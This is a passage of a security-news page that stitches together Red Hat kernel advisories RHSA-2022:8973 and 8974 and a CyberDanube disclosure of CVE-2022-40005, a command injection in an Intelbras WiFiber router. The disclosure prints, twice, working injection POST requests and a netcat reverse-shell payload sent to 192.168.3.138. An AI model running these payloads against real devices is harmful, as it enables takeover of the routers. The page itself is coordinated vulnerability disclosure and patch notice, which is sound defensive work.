ex_handler_fprestore+0x3f/0x50 (BZ#2134589)

* crypto/testmgr.c should not list dh, ecdh-nist-p256, ecdh-nist-p384 as  
.fips_allowed = 1 (BZ#2136523)

* FIPS self-tests for RSA pkcs7 signature verification (BZ#2136552)

* [ovs-tc] Bad length in dpctl/dump-flows (BZ#2137354)

* [RHEL9] s_pf0vf2: hw csum failure for mlx5 (BZ#2137355)

* kernel memory leak while freeing nested actions (BZ#2137356)

* ovs: backports from upstream (BZ#2137358)

* kernel should conform to FIPS-140-3 requirements (both parts)  
(BZ#2139095)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12.  
(BZ#2139214)

* Fix panic in nbd/004 test (BZ#2139535)

* Nested KVM is not working on RHEL 8.6 with hardware error 0x7  
(BZ#2140141)

* [RHEL9] Practically limit "Dummy wait" workaround to old Intel systems  
(BZ#2142169)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-doc-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-devel-matched-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-devel-matched-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kernel-5.14.0-70.36.1.el9_0.src.rpm

aarch64:  
bpftool-5.14.0-70.36.1.el9_0.aarch64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.36.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.36.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.36.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9+dzjgjWX9erEAQjSXxAAhEihoM+2Y0PUAdnoM55yPu0hNbruEYor  
/a+0kD2hhj9jeHm0ixX7bEa6g4dFRRVHxCGjPkvCuxmwB2+z27XWyDssyGP6NHG9  
z4hKa2yFVG0QCNDxum2FjF8GVhHELESuuGm+9ouJ6y18YUSkbmVts08PBa2pA79v  
0HLCMg7lHqdVIpgJ1eUIWBxU9t9yd09NZazyQEx4nKuAw44tJvljw96xpxp1Nnhe  
pIMsceSrmT3HYuhkhqaScT5gy0MHKSbLC8iJeX54UFJeY/tD2XX7DwdAB1jdxEv3  
8+vkmkgNFmCcxQlryjANle7URr/Z2i5An0ejRTN9tL1fWxB6UJbsU55x2zjQQBRs  
u90Yingm1b5vwEQp7+J0R1tSW34MnXwBcP8lU0ZTeZ6c7gaRkHArJpEfDXndJUDy  
OjGf5OI93n1ixyLUgCAF6/jwUNRy+yGWiqvvaHD4pJb79O/IESotOFxNWZ3vYPfL  
QElAENKuEF0SiS3gTe/2RZ5I+wIpnrdGmTkS4as4kyb1zvSERJY2eTC6UDQgMi15  
8u8yxMqpdtYO8+4knYwSDxYaplH+cC6Ktxso8cpskOdOstSChWC6plblOvGfRFTA  
VeDwyTZ3bG0v7WKZJ0Xl3L3ZR9yDz3XSUBADx2PN8VdyoetCFX7xgDPK7fL2rhvV  
jBvWwm6iwuc=  
=qCP1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8973-01

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Intelbras WiFiber 120AC inMesh 1.1-220216 Command Injection

Red Hat Security Advisory 2022-8974-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow, code execution, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8974-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8974  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

